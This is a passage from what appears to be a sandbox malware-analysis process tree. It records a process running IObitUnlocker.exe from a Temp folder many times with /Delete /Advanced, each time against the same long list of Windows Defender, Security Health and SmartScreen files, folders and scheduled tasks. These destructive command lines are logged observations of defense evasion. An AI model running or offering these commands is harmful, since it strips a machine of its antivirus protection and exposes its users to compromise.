Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                PID:7132
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6596
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:6456
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:7120
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:4508
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:6624
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:4428
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:6384
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:6912
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:7148
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.d